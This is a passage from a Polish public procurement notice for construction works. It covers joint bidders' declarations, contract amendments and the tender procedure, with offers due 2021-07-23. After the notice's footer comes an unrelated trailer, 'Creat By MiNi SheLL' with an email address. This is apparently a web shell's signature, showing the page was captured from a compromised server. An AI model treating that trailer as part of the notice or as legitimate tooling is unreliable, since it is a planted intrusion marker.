oświadczenia, o których mowa w § 8 ust. 2 składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają spełnianie warunków<br/>udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z<br/>Wykonawców wykazuje spełnianie warunków udziału w postępowaniu, oraz brak podstaw<br/>wykluczenia.4) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców<br/>oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o<br/>którym mowa w § 8 ust. 4 IDW składa każdy z Wykonawców.5) W przypadku wspólnego<br/>ubiegania się o zamówienie przez Wykonawców są oni zobowiązani na wezwanie<br/>Zamawiającego złożyć podmiotowe środki dowodowe, o których mowa w § 8 ust. 7, przy czym<br/>dokumenty i oświadczenia, o których mowa w § 8 ust. 7 pkt 1) składa odpowiednio Wykonawca,<br/>który wykazuje spełnianie warunku, w zakresie i na zasadach opisanych IDW. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie ze wzorem umowy stanowiącej załącznik do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-23 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zorawina.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-23 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-21</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-08 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com